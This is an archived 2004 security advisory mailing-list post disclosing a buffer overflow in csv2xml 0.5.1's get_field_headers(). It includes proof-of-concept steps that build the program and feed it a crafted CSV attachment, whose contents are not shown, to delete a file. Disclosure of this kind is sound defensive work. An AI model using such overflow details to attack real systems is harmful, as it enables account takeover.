Date: 15 Dec 2004 08:28:20 -0000
Message-ID: <20041215082820.47275.qmail@cr.yp.to>
From: "D. J. Bernstein"
To: securesoftware@list.cr.yp.to, jacobrhoden@users.sourceforge.net
Subject: [remote] [control] csv2xml 0.5.1 get_field_headers overflows token

Limin Wang, a student in my Fall 2004 UNIX Security Holes course, has discovered a remotely exploitable security hole in csv2xml. I'm publishing this notice, but all the discovery credits should be assigned to Wang.

You are at risk if you take a CSV file from an email message (or a web page or any other source that could be controlled by an attacker) and feed that document through csv2xml -m=2. (The csv2xml documentation does not tell users to avoid taking input from the network.) Whoever provides that document then has complete control over your account: she can read and modify your files, watch the programs you're running, etc.

Proof of concept: On an x86 computer running FreeBSD 4.10, type

   wget http://umn.dl.sourceforge.net/sourceforge/csv2xml/csv2xml-0.5.1.tar.gz
   gunzip < csv2xml-0.5.1.tar.gz | tar -xf -
   cd csv2xml-0.5.1
   make

to download and compile the csv2xml program, version 0.5.1 (current). Then save the file 53.csv attached to this message, and type

   src/csv2xml -m=2 < 53.csv > 53.xml

with the unauthorized result that a file named x is removed from the current directory. (I tested this with a 449-byte environment, as reported by printenv | wc -c.)
Here's the bug: In csv2xml.cpp, get_field_headers() uses get_csv_token() to read any number of bytes into a 1001-byte token[] array. This can be blamed on get_csv_token(), which has a fundamentally broken gets()-style interface.

---D. J. Bernstein, Associate Professor, Department of Mathematics, Statistics, and Computer Science, University of Illinois at Chicago

Content-Disposition: attachment; filename="53.csv"